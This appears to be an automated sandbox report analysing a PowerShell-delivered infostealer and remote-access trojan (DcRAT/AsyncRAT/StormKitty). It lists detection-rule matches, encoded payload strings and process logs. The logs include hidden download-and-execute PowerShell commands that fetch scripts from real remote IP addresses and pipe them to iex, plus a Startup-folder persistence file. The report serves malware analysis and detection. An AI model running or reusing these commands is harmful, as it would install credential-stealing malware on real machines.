Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE	Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: powershell.exe PID: 2180, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: 8.2.powershell.exe.8670000.9.raw.unpack, ClasserPlus.cs	Base64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
Source: 8.2.powershell.exe.8660000.8.raw.unpack, Knvbl.cs	Base64 encoded string: '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
Source: 8.2.powershell.exe.4f6df4c.3.raw.unpack, Knvbl.cs	Base64 encoded string: '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
Source: 8.2.powershell.exe.503a820.4.raw.unpack, ClasserPlus.cs	Base64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
Source: iacipmps.dll.9.dr, ClasserPlus.cs	Base64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winPS1@28/23@0/2

Source: C:\Windows\Temp\Package.exe

Code function: 5_2_00D3642D CoCreateInstance,GetUserDefaultLCID,StringFromGUID2,wsprintfW,RegOpenKeyW,RegEnumKeyW,RegOpenKeyW,RegQueryValueExW,wsprintfW,RegCloseKey,RegCloseKey,

5_2_00D3642D

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4336:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3032:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2972

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3g0oggsa.xw4.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2 ps1.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdwByAGMAYQBmAC4AcABzADEAIAB8ACAAaQBlAHgA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Package.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Temp\Package.exe C:\Windows\Temp\Package.exe
Source: C:\Windows\Temp\Package.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } \| iex"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } \| iex"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C9B.tmp" "c:\Users\user\AppData\Local\Temp\iacipmps\CSCF2F885C8C35E43FC9D7ABBAE94A3C2AF.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Temp\Package.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 204
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdwByAGMAYQBmAC4AcABzADEAIAB8ACAAaQBlAHgA	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Package.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Temp\Package.exe C:\Windows\Temp\Package.exe	Jump to behavior
Source: C:\Windows\Temp\Package.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } \| iex"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } \| iex"	Jump to behavior
